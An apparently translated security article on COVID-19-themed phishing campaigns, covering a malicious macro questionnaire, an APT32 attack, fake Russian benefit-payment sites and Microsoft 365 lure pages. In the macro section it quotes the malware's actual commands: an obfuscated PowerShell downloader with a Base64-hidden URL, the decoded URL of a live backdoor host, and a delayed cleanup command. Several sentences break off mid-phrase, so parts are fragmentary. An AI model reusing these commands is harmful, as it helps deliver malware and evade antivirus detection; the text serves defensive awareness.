Attackers continue to exploit the topic of COVID-19, creating more and more new threats for users who are keenly interested in everything related to the epidemic. IN
Remember in
Would you like a free COVID-19 test?
Another prominent example of coronavirus-themed phishing was
Convincing most users to enable macros was also easy. To do this, a standard trick was used when, in order to fill out a questionnaire, you must first enable macros, which means running a VBA script.
As you can see, the VBA script is specially masked from antiviruses.
Windows has a wait feature where an application waits /T <seconds> before accepting a "Yes" response by default. In our case, the script waited 65 seconds before deleting temporary files:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
While waiting, malware was being downloaded. To do this, a special PowerShell script was run:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
After decoding the Base64 value, the PowerShell script downloads a backdoor located on a previously hacked web server from Germany:
http://automatischer-staubsauger.com/feature/777777.png
and save it under the name:
C:UsersPublictmpdirfile1.exe
Folder ‘C:UsersPublictmpdir’
is deleted when the file 'tmps1.bat' is run, which contains the command cmd /c mkdir ""C:UsersPublictmpdir"".
Targeted attack on state structures
In addition, FireEye analysts recently reported on a targeted APT32 attack aimed at government structures in Wuhan, as well as the Chinese Ministry of Emergency Management. One of the RTFs distributed included a link to a New York Times article titled
Interestingly, at the time of discovery, none of the antiviruses detected this instance, according to Virustotal.
When official sites are down
The clearest example of a phishing attack happened in Russia just the other day. The reason for this was the appointment of a long-awaited allowance for children aged 3 to 16 years. When the start of accepting applications was announced on May 12, 2020, millions rushed to the Gosuslugi website for long-awaited help and brought down the portal no worse than a professional DDoS attack. When the president said that “Government Services failed to cope with the flow of applications,” the network started talking about the fact that an alternative site for accepting applications had been launched.
The problem is that several sites have started working at once, and while one, the real one at posobie16.gosuslugi.ru, really accepts applications, yet
Colleagues from SearchInform found about 30 new fraudulent domains in the .ru zone. Infosecurity a Softline Company has tracked more than 70 similar fake government services sites since the beginning of April. Their creators manipulate the usual symbols, and also use combinations of the words gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, and so on.
Hype and social engineering
All these examples only confirm that attackers are successfully monetizing the coronavirus theme. And the higher the social tension and the more unclear issues, the more likely scammers are to steal important data, make people hand over their money on their own, or simply hack more computers.
And given that the pandemic has forced potentially unprepared people to work from home en masse, not only personal, but also corporate data are at risk. For example, users of Microsoft 365 (formerly Office 365) were also recently phished. People massively received voice “missed” messages in attachments to letters. However, in fact, the files were an HTML page that sent the victims of the attack to
Source: habr.com